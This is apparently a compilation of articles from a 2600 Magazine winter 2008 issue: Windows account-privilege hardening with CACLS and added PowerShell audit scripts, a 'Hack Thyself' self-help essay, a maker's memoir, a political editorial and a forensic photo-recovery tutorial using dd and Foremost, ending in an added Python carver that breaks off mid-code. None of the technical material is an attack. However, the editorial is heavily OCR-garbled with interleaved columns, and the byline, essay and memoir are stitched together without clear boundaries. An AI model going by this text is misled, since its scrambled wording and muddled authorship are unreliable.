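    "OK: only " + ($AllowedAdmins -join ", ") + " hold administrative rights."
}

$fatVolumes = @(Get-NonNtfsVolumes)
if ($fatVolumes.Count -gt 0) {
    "Fixed volumes not using NTFS (no per-user file security):"
    $fatVolumes | ForEach-Object { "  " + $_.DeviceID + " " + $_.FileSystem }
} else {
    "OK: all fixed volumes are NTFS."
}
```

On the Doe machine as described, the first check would list all five family accounts, since every one of them was created as an administrator.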
0x04. Spotting the security flaws:
Anyone with an eye for computer security will immediately spot several major mistakes in the way that the system has been set up and managed. Giving all users of the computer administrative privileges is a major error in any circumstance. Especially so, when some of those users are children. As any parent will readily testify, children love playing computer games. The first thing he or she will do upon coming home is to download and install the game so that they can play it with their friends and compete for the highest score. Very rarely will a child think to run a virus/malware scan over the game before installing it. They may even think that it's safe just because it came from a website. If the game comes with malware attached, as so many "free" games
and applications do, then it'll be installed along with the game and gain full access to everything on the system. Remember, the child's account has admin rights. In this case, a firewall (or even 1,000 firewalls) would be completely useless in preventing the application from making it to the computer because the initial connection to the download site was made by the user. Although a firewall might warn the user that the application is trying to communicate with the Internet when it's run, many users will allow such communications as a reflex action, especially if the game, or whatever application, is known to make use of some kind of online functionality.
Likewise, giving any regularly used account administrative rights is an unwise practice for a computer in a home or general office environment, as it would grant any potentially malicious code (say, ActiveX controls in a web page) full reign of the system. It takes only a momentary lapse in security - or just a single web page - for malicious code to arrive and be executed on the computer. For general computer use, the best practice, in my personal opinion, is for every user of the system to have a restrictive user account that can only make changes to the user's own document folders, and to have a single administrator account that is password protected and is only ever used for system maintenance purposes and the installation of known, trusted applications... similar to the best practice often applied on Linux machines concerning use of the "root" account.
Although this practice would not defeat all forms of malware, it should make it much harder for a malicious application to gain full control of the system and access every file on the machine. This means that malware arriving and successfully installing itself under a child's account can only access and manipulate data in the child's document folders, and should only be able to monitor whatever that child is doing, as opposed to monitoring every keystroke and mouse click of every user of the machine. Remember that when an application is run, it is subject to the same privileges and restrictions as the user who started it, therefore an application running under a restricted user account should not be able to make changes to the operating system, or access any other user's files.

0x05. A clean, more secure installation:
John Doe has had enough of the constant virus and malware alerts, the abysmal machine and Internet performance, and the continual errors. Enlisting the help and advice of a computer-literate friend (who we'll call Bob), he decides to go for a full format and reinstallation of his system. Under Bob's supervision, he carefully backs up user files on the machine, avoiding unrecognized EXE, COM, MSI, and VBS files in the children's accounts. He unplugs the Ethernet cable from the back
of the computer, and reboots the machine with the Windows XP CD-ROM inserted. After rebooting, he performs a full NTFS format of the hard drive, and Windows XP begins installing as normal.
After the usual succession of reboots, progress bars, language/network related prompts, setting a very strong password for the "Administrator" account, and on-screen messages of how "superior" Windows XP is, he comes to the Windows XP first-run screen or what Microsoft calls an "Out of Box Experience." Upon arriving at the page where the user enters names for accounts that will use the machine, Bob tells him to stop entering account names as there is a problem with this page: All accounts created here will be given administrative rights by default, and it's very difficult, if not downright impossible, to change them
to limited accounts later on. Instead, Bob advises creating a single account called "SuperUser" that can be used to create general user accounts, and for system administration at a later date.
After even more waiting around whilst Windows gets its first-run act together, John is finally logged in as "SuperUser" and gets a default Windows desktop. Before doing anything else, Bob shows him how to turn on the Windows firewall (My Computer > Network Connections > Right-click the Internet connection > Select "Properties" > Click the "Advanced" tab > Check the box and click "Apply") and he sets it up with the "Don't allow exceptions" rule. John then reconnects his Ethernet cable, activates Windows over the Internet, and updates his machine using Windows Update. Now his machine has been fully updated with the latest security patches, and the most up-to-date settings for default users have been applied.
After updating Windows with the latest security patches and making a "clean start" system restore point (Start > Programs > Accessories > System Tools > System Restore) he proceeds to the "User Accounts" control panel to create logons for himself, his wife, and kids. Before doing anything else though, he sets a suitably strong password for the "SuperUser" account so that only authorized users (himself and Bob in this case) can perform system-wide changes and application installations. After this, he creates new accounts for everyone and ensures that everyone, himself included, has a "restricted" account that will not be able to change anything that would affect the system. Additionally, he turns off the "Fast user switching" feature (User Account control panel > Change how users log on and off) to reduce the chance of a malicious application running under a restricted user account managing to "jump" over to the SuperUser account if both are logged in at the same time.
Finally, after reinstalling Windows, activating the Windows firewall, creating restricted accounts for all users, performing fresh installs of security software and firewalls, and restoring backed-up user data, he tests his restricted account by logging on and trying to install an application, finding it to his satisfaction that the install program quits with an "Access denied - User has no administrative privileges" error.

0x06. Dealing with troublesome applications:
A year after reinstalling his system in this way, everyone is still happy with how well it's working. Although the system does slow down every so often thanks to the large number of system services installed (security software, iTunes, and several cellphone application suites), the number of malware and virus alerts has remained very low - such alerts often being traced to game install packages downloaded by the children, that would be checked and verified by John first before installation via the SuperUser account if that application was considered safe.
However, there is one problem: David, having recently developed a serious addiction to World of Warcraft (WoW), is requesting that his user account be made into an Administrator's account. The reason is that WoW is frequently updated with new patches and software updates, and although David can play the game fine with a restricted account, updates need to be installed as the "SuperUser". It normally runs under David's account, and thus only has read permissions for the WoW program folder, and John can't always be there to update the game as soon as a new patch is released. Noting that the majority of malware and virus alerts on the system are traced to files stored in David's account, John is rightly against the idea of giving David's account administrative rights. He consults Bob for advice on how to work
around the problem without placing the system at risk.
Bob knows that every file and folder on an NTFS drive has an Access Control List (or ACL) attached to it that controls which users can access, create, or change that file. Noting that David is the only family member who uses WoW, he logs in as "SuperUser", opens the command prompt (Start > Run > type "command.com" and hit [Enter]), changes to the "Program Files" folder by typing "CD \progra~1" [Enter] (which is a DOS short-path and should be valid on Win XP and Vista PCs), and checks the ACL for the World of Warcraft folder by typing "cacls worldo~1" [Enter]. This shows a list of which users have access to the WoW folder: all users can read it, but only administrators can make changes. Typing "cacls /?" will display a brief guide to using the command.
The next step is best done only by experienced computer users: Bob decides to give David full access rights to the World
of Warcraft folder, and uses the command "cacls worldo~1 /T /E /C /G David:F". This gives David full read/write/modify/execute rights to the WoW program folder and every file and folder below it. After verifying the output, Bob logs out of "SuperUser" and asks David to log in and try running WoW to see if the changes to the ACL were successful. David tries some functions that would result in data being changed on the hard drive (performing a WoW update, taking in-game screenshots, and setting up character macros are three such tests that can be performed), and finds that now the in-game screenshots and character macros have been saved to the WoW program folders successfully.
As a precaution, Bob also adds a shortcut to David's startup folder (Start > Programs > Startup) that fires up the antivirus program and performs a full scan on the WoW folder to make sure that no malware infections in the WoW folder go undetected, before WoW itself is run.
Another approach to solving this problem, useful if an application is accessed by multiple users, is to create a new restricted user account specifically for that program, give the account read/write or full access to the relevant folder using CACLS, and change the application shortcuts to make sure that the program is run under the application-specific account (Right-click the shortcut > Select "Properties" > Click the "Advanced" button under the "Shortcut" tab > Select "Run As" or "Run with different credentials") instead of the current user's account. An additional benefit to this approach, assuming that the "Protect my files, folders and settings" option is checked, is that anything running under that account, including malware, will be denied access to user files or folders by Windows. However this technique would inhibit legitimate read/write operations to user files if it was applied to a program that uses them, such as Microsoft Word.
Following Bob's simple modification to the WoW folder ACL, David has been able to play and update World of Warcraft himself, without needing John or Bob to log in under the "SuperUser" account. This has saved David a lot of inconvenience and waiting around, and John no longer has to deal with continual requests and SMS messages asking him to come home and update WoW as soon as he can!

0x07. Windows security and best-practice summary:
For those who have lost all track of what I am saying thanks to the sheer volume of text above, here is a brief "bullet-point" summary of the article:
• Windows 2000, XP and Vista all use the more secure NTFS filesystem by default, and this makes it easier to control which users can do what. If you're still using Windows 98 or ME (or horror of horrors, Windows 95!) with a FAT filesystem, consider upgrading your operating system as quickly as possible. This also applies to Windows 2000/XP computers upgraded from Windows 95/98/ME that are still using a FAT filesystem on the hard drive instead of NTFS.
• Firewalls may prevent malware from sending data (keylogging info, etc.) to external servers, but they won't stop viruses or malware from arriving on a machine if a user unknowingly downloads them in the first place. Most firewalls allow known web browsers (IE and Firefox, to name but a few) to always connect to the Internet, effectively throwing open the door for malicious data to come through if the user opens the connection in the first place.
• Viruses and malware can only run with
the same privileges as the current user, at least until they are run under an account with admin rights. Therefore, if the current user account is a restricted one, any malware programs running under it will only be able to change data under the user's own data folders and "shared documents", and will have a great degree of difficulty installing themselves as a system-wide application or service.
• When using Windows 2000, XP or Vista, the best practice is to make all user accounts (i.e. the one that you use to log on to Windows) restricted ones, and only use accounts with admin privileges for system maintenance. This is especially important where accounts used by children or teenagers are concerned. On the same token, one should always be very careful when logging onto an account with administrative rights, and make sure that you don't run anything that is potentially unsafe. Do a cold boot (shutdown, wait a minute, then power up again) if you consider it necessary.
• Windows 2000 and XP users beware that accounts created using the initial Windows welcome and setup screens are given administrative privileges by default, and it's very hard to change them to restricted accounts later on. Just create a single "SuperUser" account (use whatever name you wish) to get past the setup screens, and create restricted accounts later on. This might not apply to Vista users, but you should double-check this by looking carefully at the user accounts control panel all the same.
• If a program needs to update itself on a regular basis by writing updated files to its own folders, consider modifying the file/folder ACL using the CACLS command, instead of automatically giving the user of that program administrative rights to the whole system.
• If several users all make use of a regularly updated program, consider creating a restricted user account especially for that program and configure access rights and restrictions for that account, ensuring that the account itself can only change the program and directly associated files that it has been created for. Remember to set the program to only run under that special account, instead of having it run as the current user.
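The CACLS change from 0x06 and the application-specific account from the last two bullets, carried out in PowerShell as an added example that is not part of the original article. The account name, the folder path and the password prompt are this example's own assumptions; it also grants Modify rather than the "David:F" full control used in 0x06, so the account can update the program's files but cannot rewrite the folder's ACL and widen its own rights later.

```powershell
# Added example (not the article's own code): give one dedicated restricted
# account write access to one program folder, as 0x06 does with CACLS, then
# list who can write there. Run this from the "SuperUser" (administrator) account.
# The account name, folder path and password handling are assumptions for this example.

$AppAccount = "WoWUpdater"                          # hypothetical account name
$AppFolder  = "C:\Program Files\World of Warcraft"  # hypothetical folder path

function New-RestrictedLocalUser {
    param([string]$Name, [string]$Password)
    # "net user /add" on a workstation puts the new account in the local
    # Users group only: a restricted account in the article's sense.
    & net.exe user $Name $Password /add | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "net user failed with exit code $LASTEXITCODE" }
}

function Grant-FolderModify {
    param([string]$Path, [string]$Identity)
    $rights  = [System.Security.AccessControl.FileSystemRights]::Modify
    $inherit = [System.Security.AccessControl.InheritanceFlags]"ContainerInherit, ObjectInherit"
    $prop    = [System.Security.AccessControl.PropagationFlags]::None
    $allow   = [System.Security.AccessControl.AccessControlType]::Allow
    # Modify rather than FullControl: the account can replace the program's
    # files (patches, screenshots, macros) but cannot rewrite this ACL and
    # widen its own rights later, which "David:F" in the article would permit.
    # The inheritance flags do what CACLS /T did: the entry applies to the
    # whole tree below the folder.
    $rule = New-Object System.Security.AccessControl.FileSystemAccessRule(
        $Identity, $rights, $inherit, $prop, $allow)
    $acl = Get-Acl -Path $Path
    $acl.AddAccessRule($rule)        # like CACLS /E: add to the existing ACL, don't replace it
    Set-Acl -Path $Path -AclObject $acl
}

function Get-WriteCapableIdentities {
    # Audit helper: every identity with an Allow entry that includes WriteData
    # (create/overwrite files) on the folder. After the change, expect only
    # SYSTEM, Administrators and the dedicated account to appear.
    param([string]$Path)
    $writeData = [System.Security.AccessControl.FileSystemRights]::WriteData
    (Get-Acl -Path $Path).Access |
        Where-Object {
            $_.AccessControlType -eq "Allow" -and
            (($_.FileSystemRights -band $writeData) -ne 0)
        } |
        ForEach-Object { $_.IdentityReference.Value } |
        Sort-Object -Unique
}

$password = Read-Host "Password for $AppAccount"
New-RestrictedLocalUser -Name $AppAccount -Password $password
Grant-FolderModify -Path $AppFolder -Identity "$env:COMPUTERNAME\$AppAccount"
"Identities that can write under ${AppFolder}:"
Get-WriteCapableIdentities -Path $AppFolder | ForEach-Object { "  $_" }
```

The shortcut's "Run As" setting from 0x06 still has to be changed by hand so the program actually starts under the new account; the script only creates the account and sets the folder permissions.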
0xFF. The final word:
I hope that this tutorial has helped you all learn a little about how the security setup works on Windows NT-based platforms, and some best practices for ensuring that your Windows boxes are set up to inhibit or reduce the damage done from unwanted system-wide changes and malware installations. If you need assistance with doing anything mentioned in this article, there are many free support forums out there for Windows users where you should be able to get help much quicker and more easily than I could ever manage!
Shouts to whoever came up with the User/Group/Other permission system in Linux from which the initial principles in this article are derived and a family from Guildford who were the inspiration for the case-study above, and indeed the article itself.
- - - Hack Thyself - - -
by Kartikeya Putra
alienbaby@freaknetwork.in
http://www.hopistar.org

"All human beings, all persons who reach adulthood in the world today are programmed biocomputers. None of us can escape our own nature as programmable entities. Literally, each of us may be our programs, nothing more, nothing less."
- John C. Lilly, Programming and Metaprogramming in the Human Biocomputer

In the early 1970s, during the early days of Artificial Intelligence research, scientists from the fields of psychology and computer science came together to try to improve their
understanding of how the mind works. Their efforts eventually resulted in the discipline now known as Cognitive Science. One of the more significant books to come out of this early collaborative effort was titled Scripts, Plans, Goals, and Understanding by Roger Schank and Robert Abelson, which is still used by psychologists today to support what's called the Information Processing Model of human cognition. In it, the authors suggested that human thinking is based on a set of scripts (programs) people use to meet personal goals in different situations. The example they use throughout the book is a "restaurant script" that tells people how to behave when eating out in public, in order to meet the goal of getting fed. What would you do if you ordered a hamburger and the waitress brought you a hot dog? Your scripts tell you how to handle this situation, what to do when the bill comes, and how to handle the multitude of common transactions that take place in the restaurant environment.
Scripts People Live by Claude Steiner is a book about a form of popular psychology called Transactional Analysis. Here the author talks about how everyone has a sort of running "life script" which is basically the story of your own life as you like to tell it. Inside this script there are recurring roles that are often learned in childhood, which inform us how people are supposed to behave. I doubt that anyone ever reaches adulthood with a completely accurate script of their own life story - but if you can become conscious of your script, it's possible to start improving it and improving the way you write it as you go along.
Some of our most basic programming concerns what it means to be "good" or "bad." When parents, teachers and other authorities are training us how to be "good," often this has very little to do with doing what is right and is more about training us to behave in ways that are convenient for them. Today the task of programming "reality" has substantially been taken over by television, which is like a very-low-frequency mind control device that sits in your living room, tuning you in to the corporate Matrix mainframe. It is sponsored by corporations who are not concerned with anything at all except selling their products. In one of my favorite commercials on TV right now, this bland dude - who looks to me like he knows he is about to become a complete tool - holds up a McDonald's chicken sandwich and proclaims, "Let's hear it for nonconformity!" Are you fucking kidding me? It's so phony it's almost avant garde. Andy Warhol would love it - I find it disturbing. I know that there must be a lot of people out there who don't see anything wrong with this ad - and others who even buy into it, who think that eating a chicken sandwich for breakfast really is "revolutionary."
When we were teenagers, some of us correctly perceived the system as hypocritical and said, "screw this, I'm out of here." As an adult with a little perspective now I can see that there's nothing wrong with wanting to do your own thing, but rebellion against the system is still a part of it. Maybe we found a peer group who claimed to represent "the resistance," the anti-system - but it's a trick. The anti-system is still part of the system. By joining it you think you are becoming free, but it's just a trick. As an "outsider," if you break laws or do things that hurt yourself or others, you're just playing into the role the system wants you to play - you're doing exactly what you are supposed to do as an "outsider." The anti-system system is there because they need "bad guys" so that they can play the "good guys" in comparison. If you are good and not one of them, the whole system collapses. That is revolutionary!
The foundation on which the whole sadomasochistic world system is erected is the perception of yourself as a victim. A lot of people are starting to figure this out, and when that number reaches a certain tipping point, it is going to alter the structure of the Matrix. Seeing yourself as the world's victim is profoundly disempowering and keeps you locked in a cycle of self-created pain and misery. We break free from this cycle by making a conscious decision to accept complete responsibility for creating our own reality. Get a copy of The Anger Habit Workbook by Carl Semmelroth and study it like a bible. Drs. Barry and Janae Weinhold have an excellent series of e-books titled Breaking Free from the Matrix. There are a lot of wonderful books out there to help us take control of our minds and emotions and break free from the Matrix of social control - find them, and free your mind.
We live in a time where there are no limits to creativity. If you can imagine it, you can make it. The technology of rapid prototyping is now at a stage where any object or project is in the realm of the possible. The hardware, machines, and robots that will do our bidding are waiting for people to put them to work in workshops and living rooms. The software for designing what you see in your head has never been easier to acquire and learn. We are truly in a renaissance of wonderful opportunities for people with an imagination. When I was a kid, rapid prototyping tools only existed on science fiction TV shows like The Jetsons and Star Trek. Things have changed since then.
I got hooked on repurposing technology and making things back when I was seven. My uncle, who made a living getting up early and prowling the trash of Boston looking for treasures to sell at weekend flea markets, taught me how to put together a working bike out of a bunch of broken bikes. Once I realized that I could take apart a bike and get it back together, I was obsessed with figuring out how things worked. At the library, I would settle into the 700 section and just read any books about how to make things. I daydreamed about growing up to be a mechanic with all the tools in my shop that I could ever want. A few years later in the early 80s, my parents had a software company producing children's software for the Apple II+ and the Commodore 64. I idolized programmers as magicians controlling computing machines!
As an adult I've been making a living in one way or another by learning how to make something and teaching people what I've learned. I was an art teacher in Seattle Public Schools and my goal was to give young people as many different opportunities to get hooked on different artistic mediums of self expression. In the summers when I wasn't teaching I would set myself artistic challenges. My summertime rule was that if I couldn't get started making a project within a few days of having the idea, then I would abandon the idea. I learned drawing, painting, and ceramics skills by challenging myself this way.
Then one summer, I got obsessed with video blogging and started creating tutorial videos for my students and sharing videos online. This eventually turned into a job making tutorial videos for Make Magazine and Etsy.com. At the beginning of the week, I would set myself a task and have a tutorial video up by the end of the week. Some weeks had straightforward goals such as making a secret compartment book or a duct tape wallet while other more ambitious projects required collaboration with the folks at the Seattle hacker space, Hackerbot Labs. Working with friends to create hovercrafts, drawing robots, and near space payloads were some of the best times of my life.
My web videos got the attention of mainstream media and I now have a TV show in the works called History Hacker. (The pilot aired in September on the History channel.) On the show, I explore the lives of inventors from history and remake their inventions in a way that's accessible to parents and kids. Until that goes into production, I've created a web series called Things and in it, I interview people about things that they have made.
Working on projects collaboratively is very satisfying. When I moved from Seattle to New York City in 2007, I needed a hacker space. I visited hacker spaces
Page 26 ------------------- 2600 Magazine
2600 v25 n4 (winter 2008)
2600 v25 n4 (winter 2008)

  • 1.
  • 2.
  • 4. We appear to be at one of those moments cou Id be on the verge of movi ng in a whole in history. At least in theory it seems l i ke new direction. we've arrived at a turning point, where the Of course, we expect to be disappoi nted. opportunity exists for significant and lasting Let us not forget how similar some of these change to occur. Th is is not a time to be hopes were in 1993, when the first Cli nton asleep. administration took power. They were The recent election that took place in the credited with moving the White House into United States was historic for a number of the Information Age, replacing typewriters reasons. For the first time, a member of a with computers, updating the phone system, minority group was elected to the nation's and making technical competence the norm highest office, an occurrence many never rather than the exception. But then, it wasn't expected to see in their l ifetimes. People too long before we were being faced with from a l l over the country who had never the Clipper Chip controversy. before been involved in pol itics felt a new For those who aren't fami l iar, sense of hope and empowerment throughout implementation of this flavor of encryption the campaign, a feeling that culminated on (Clipper being for phones and phone Election Day when their victory became systems) would have given the government official. Unprecedented celebrations broke the keys (l iteral ly) to all approved encrypted out throughout American cities and even i n traffic with many fearing that any other kind many foreign ones. This perception of true of encryption wou ld soon become i l legal . It change, even if it never goes beyond a mere was a l l based on a closed system so nobody perception, has been inspiring and has given real ly knew how secure it was. The idea of many of us an a l l too rare dose of optimism. 
just trusti ng the government to do the right In the hacker/technological world, we th ing didn't real ly sit wel l with anyone have a particular reason to open our eyes. understanding what was at stake. Strong On a technical front, Barack Obama seems to opposition from the rapidly growing I nternet get it, qu ite a bit more than his predecessors commun ity and the emergence of publ ic and opponents. He spoke out i n favor of encryption tools such as PCP helped to keep net neutral ity years ago and seemed quite this bad idea from ever taki ng off and the fam i l iar with why it was important. His project official ly died i n 1996. campaign clearly understood how to use The Digital Telephony Law (or CALEA) h igh tech to thei r advantage, rangi ng from made it orders of magnitude easier to tap the widespread use of text messaging i n telephone cal l s i n digital switches. It was order to reach supporters to embraci ng passed i n 1994. The Digital Mil lennium the I nternet i n getting the message out and Copyright Act (which 2600 was the first ral lyi ng support. This is significant. Someone official victim of) became law in 1998 and who has an actual grasp and comprehension created all sorts ofrestrictions and regulations of technology, along with its risks and on how people could use technology on their essential freedoms, is poised to push pol icy own computers or elsewhere, threateni ng i n a direction that m ight benefit a l l of us. We the val ued concepts of fair use a'ld reverse Page 4 -------------------- 2600 Magazine
  • 5. engineering. I will prevent network providers from There are more examples of bad discriminating in ways that limit the freedom legislation coming out of the Cli nton years of expression on the Internet. Because most that served to set back technology, as wel l Americans only have a choice o f only one as stifle creativity and free speech. The or two broadband carriers, carriers are point here is not to list them but merely tempted to impose a toll charge on content to acknowledge the fact that having one and services, discriminating against websites side or another in power is no guarantee that are unwilling to pay for equal treatment. that things are going to move in a positive This could create a two-tier Internet in which direction. We certainly don't have to l ist a l l websites with the best relationships with of the bad ideas and precedents that came network providers can get the fastest access out of the last eight years on everything from to consumers, while all competing websites border searches of laptops to increased remain in a slower lane. Such a result would domestic survei l lance - each in the name threaten innovation, the open tradition and of "homeland security" and each having archileclure oflhe Inlernet, and competition absol utely no effect on anything truly among content and backbone providers. It dangerous, but a l l too much of an effect would also threaten the equality of speech on our everyday l ives and our perceptions through which the Internet has begun to of what constitutes normal ity. We can only transform American political and cultural hope that reversal and termination of some discourse. Accordingly, network providers of these pol icies is h igh on the priority l ist should not he allowed to charge fees to of the new administration. privilege the content or applications of some The lesson here is that possession of wehsites and Internet applications over mere fami l iarity with technology doesn't others. 
This principle will ensure that the new mean that the people running things wi l l competitors, especially small or non-profit act in a manner that's fair to the rest of us. speakers, have the same opportunity as Oftentimes it works in exactly the opposite incumbents to innovate on the Internet and way. Power and control do strange things to to reach large audiences. I will protect the people, after a l l . Internet�s traditional openness to innovation A great paral lel can be seen in schools. and creativity and ensure that it remains a Who wi l l allow you to experiment and platform for free speech and innovation thai accompl ish more on the school computer will benefit consumers and our democracy." network? The teacher who knows next to Those remarks came from an interview nothing about the subject? Or the self- Obama gave back in 2007. He clearly has a I· d t' F th f h handle on what the Internet is about and the proc alme exper ( or ose 0 us w 0 feel comfortable working and playing potential it promises, as wel l as the threat with technology, being left alone and posed by those entities who want to create more controls and restrictions. It is essential avoiding micromanagement is all we that th is ideal ism not be sacrificed to the rea l ly need. But when those who imagine themselvesI'n h f I 'f th d 't powerfu l interests that stand to benefit from c arge ee asI ey on the reigning in of freedom. And that task have total control and understanding over falls to us - the people - to ensure that this every nuance of the environment they're promise is upheld. supervising, that's when fear and irrational behavior take hold. I n school we see that in For now, though, let us bel ieve there is the form of unreasonable restrictions and hope for some positive shifts in the road we've been going down. The worst thing we punishment. 
In the government, we see it as cou ld do wou ld be to resign ourselves to the an obsession with survei I lance and speech opi n ion that change is never possible or that it mon itori ng. Those in charge are always in can only occur when a phenomenal amount fear of being ecl ipsed by the very people of conditions are met - which basically they're supposed to be controlling. And we achieves the same effect as perpetua l don't expect that underlying trepidation to pessimism. Even in the best case scenario, change. we know there wi l l be setbacks and pol icies That is not to say that we can't hang onto that ultimately prove detrimental . But in this some optimism. A quote l i ke this provides historic moment, there is great potential for us with ample reason: steps to be taken and for a new begi nning "The Internet is the most open network on a variety of levels. It wi l l be worthwhi le in history. We have to keep it that way. to pay close attention. Winter 2008-2009 ------------------ Page 5
  • 6. INTRODUCTION TO FORENSIC DATA RECOVERY by Paradox Recently wh i le travel i ng in Cuba, I had the u nfortunate l uck of hav i ng an enti re week' s worth o f photos i nadvertently deleted from my d igita l camera ' s memory card. These photos were obviously not something I cou ld have recreated and I had n ' t yet been able to copy them off of the card onto the computer. Was a l l lost? No! By employ i ng some basic computer forensics ski l ls and some Linux kung-fu I was able to recover all of the lost photos. Fi rst thi ngs fi rst we need to learn about what happens when you "delete" a fi le from a d igital system l i ke a computer, cel lphone, camera, etc. Wh i l e many hold the naive notion that a delete is fi nal and that the bits go to the big /dev/nu l l i n the sky, it probably won 't come as a surprise to many of you that this isn't the case at a l l . W h i l e each fi lesystem handles deletion differently in techn ical implementation, the concept they uti l ize is the same. When you delete a fi le from the storage med i u m where your fi lesystem i s located, the bits that your data is stored i n are simply marked as "unused". Deletion by the defi n ition of the word tends to imply an "overwriti ng" or "zeroi ng" procedu re, i .e. actually getting rid of the data. Actua l ly zeroing the bits that hold you r to-be-deleted data wou ld be a time i ntensive procedu re; especially when you start to consider deletion of large fi les. The "mark as unused" sol ution accomp l ishes the same thing as far as the operating system is concerned; the data wi l l eventually b e overwritten by new data that is written to disk. Th is "eventua l ly" clause is what we can exploit to save our data. your express desire! As mentioned, after deleting a fi le, the space it occupies i s free game for a nyth i ng that comes along need i ng disk space. 
Therefore, if a log fi le happens to be created immediately after you delete your fi le, there is a chance that some of that log fi le's data w i l l end up overwriti ng you r deleted fi le. Thus the only way to be sure that you r deleted data wi l l remain i n an u ncorrupted and recoverable form is to i m medi ately exit the operating system, shut down the dev ice, pu l l the plug, eject the disk, and otherwise ensure that the device rema ins i n a read-on l y state for t h e rest o f th is tutorial. Now that we have the dev ice i n a state where we feel confident that no new data can be written to it, it wou ld be wise to make an exact copy instead of worki ng with the origi nal. Si nce our deleted fi les are marked as free space at this poi nt, we can't just mount the device as read only and use trusty old cp to copy our deleted fi les off. I nstead, we need to create a byte-for-byte copy of the dev ice i ncluding all of the free space, s i nce our deleted data is tucked away somewhere i n there. To do this, we' l l use the Linux dd command. Th is command comes instal led with every modern distribution of Linux I have ever encountered, and wi l l surely be i nsta l led on you rs. My recommended procedu re is to down load and burn the Knoppix Linux l ive C D. Th is has several benefits, most importantly: Knoppix wi l l mou nt any app l i cable fi lesystems i t fi nds o n the computer a s read-on l y by defau lt. Th is is prefect for our pu rposes si nce we don't want to accidenta l l y write any data to the dev ice. Once you have booted i nto the Knoppix env i ronment we need to fi nd the Linux device name of our target device and the partition number. I n the case of my camera it was /dev/ sdb 1. Serial dev ice B, partition 1. I found this by ru n n i ng: ls -] /dev/disk/by-id/usb* Obviously if you are searching for a non-USB dev ice you wou ld excl ude the "llsb*" section of the command that fi lters the resu Its. 
The fi rst, and arguably, most important thi ng to take away from th is over-si mplified lesson on fi le deletion is that you must immediately disable writi ng to the dev ice you wish to recover from. Operating systems and device fi rmware are complex and very large programs. They are constantly writi ng thi ngs to d i sk without you r i ntervention. Background processes are swapped to disk, log fi les are being written to, and a l l sorts of data is bei ng persisted. Th is a l l happens without Page 6 --------------------- 2600 Magazine
Once we have the Linux device name we can begin creating an image of the disk. First, make sure you have enough free space on a write-enabled device to store the disk image. The disk image will be the same size as the total capacity of the device we are trying to recover from. Since I was recovering images from a 1GB memory card, I needed to make sure I had ~1GB free on my computer's hard drive. To begin the imaging process enter the command:

sudo dd if=<input device/partition> of=<outputFile>

i.e. in my case I ran:

sudo dd if=/dev/sdb1 of=/home/daniel/diskImage.dd

This imaging process may take a while depending on the size of the disk partition you are imaging. In my case, it took approximately 15 minutes. Once the image process is complete, you can safely remove the device from your system and store it in a safe place. With our disk image in hand we can perform the recovery from any Linux machine. Now while the tool we are planning to use to recover our data can work out-of-box with a dd image, some tools can't. If you are planning to use a tool that wants to work with the filesystem itself then you'll want to mount this dd image as a "loopback" device. To do that you would run:

sudo mount -o loop -t <type> <imageLocation> <mountLocation>

i.e. in my case I ran:

sudo mount -o loop -t vfat /home/daniel/diskImage.dd /mnt/diskFiles

Make sure that your mount location exists before running this command. In my case, if the "diskFiles" folder didn't exist, the mount would fail. We can now run our recovery tool to scrape out as many files as we can from the free (i.e. deleted) space of our device. The tool we are going to use is called Foremost. It is a very simple to use tool that was originally created by the U.S. Air Force and later made open source and public. It has the ability to recover a few common filetypes automatically. These types include images, executables, documents, movies, etc. It supports ext3, fat, and ntfs filesystems, so chances are that your device will be supported. More information on the tool can be found at the website provided at the end of this tutorial. On a Debian system it was just a matter of running the following command to install foremost:

sudo apt-get install foremost

We are now ready to recover our files. If you know the specific type of file you wish to recover you can save time by telling Foremost to only recover that type. In my case I knew my camera saved the images as JPG files. So I ran:

sudo foremost -t jpg -i /home/daniel/diskImage.dd -o /home/daniel/recovered

If you wanted Foremost to try and recover all types of files it could (this may take a long time) you would run:

sudo foremost -t all -i <imageLocation> -o <outputFolder>

The -t argument is what tells Foremost which kind of files you want to recover. For instance, if you wanted to recover Office-type documents such as .ppt and .doc you would use -t ole. Consult the documentation to find out which file-type flags are supported. Again, it is important that the output folder exists before you run Foremost. Once it has finished you will have hopefully recovered the data you were looking for to the recovery folder you specified. There is however one more hurdle to jump before you can find out. Foremost (like most of the tools we've used so far) can only operate as root. As such the output files it generated are also owned by root. To fix this we'll chown them to our user:

sudo chown -R <yourUser>:<yourUser> <outputFolder>

In my case that meant running:

sudo chown -R daniel:daniel /home/daniel/recovered

You can now change directories into your recovered folder. You'll find an audit text file in the root of your recovered folder outlining what Foremost was able to recover. Most importantly though, you will find all of the recovered files organized into folders by type. In my case I found all 75 of my missing JPGs in the /home/daniel/recovered/jpg/ folder. Hopefully you found your files too!

This tutorial should serve as a good starting point for your journey into understanding computer forensics. Advanced topics exist to supplement your knowledge. For instance, Foremost is limited to specific filetypes. If you want to recover other files you may have to resort to using advanced software like Autopsy and Sleuthkit, but these require a deeper understanding of computer forensics. Undoubtedly you will find that the concepts you learned in this tutorial will serve you well if you attempt to further your knowledge.

Resources
http://foremost.sourceforge.net/
http://linux.die.net/man/1/dd
http://linux.die.net/man/8/mount
http://www.knoppix.org/

Winter 2008-2009 ------------------ Page 7
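To make concrete what Foremost does with the dd image above, here is a minimal header/footer carver (an added example, hypothetical code that is neither Foremost's nor the tutorial's); the signature table, the sample image and the output layout are all constructed, and it also handles a file whose footer was overwritten, which the tutorial does not discuss.

```python
"""Minimal Foremost-style file carver: pulls files out of a raw dd image by
signature alone, without reading the filesystem.  Hypothetical code."""
import os
from dataclasses import dataclass

# Constructed signature table: (header, footer, size cap).  Foremost's own
# foremost.conf defines many more types; three are enough to show the idea.
SIGNATURES = {
    "jpg": (b"\xff\xd8\xff", b"\xff\xd9", 20 * 1024 * 1024),
    "png": (b"\x89PNG\r\n\x1a\n", b"IEND\xaeB`\x82", 20 * 1024 * 1024),
    "gif": (b"GIF8", b"\x00\x3b", 5 * 1024 * 1024),
}


@dataclass
class CarvedFile:
    ftype: str
    offset: int   # byte offset of the header inside the image
    data: bytes


def carve(image: bytes, types=("jpg",)):
    """Scan the image for each requested header and cut out everything up to
    the matching footer.  A file whose footer is missing (overwritten cluster,
    truncated image) is cut at the size cap instead of being lost."""
    found = []
    for ftype in types:
        header, footer, max_len = SIGNATURES[ftype]
        pos = 0
        while (start := image.find(header, pos)) != -1:
            limit = min(len(image), start + max_len)
            end = image.find(footer, start + len(header), limit)
            if end == -1:
                data = image[start:limit]      # no footer: keep the capped chunk
                pos = start + len(header)      # and keep scanning inside it
            else:
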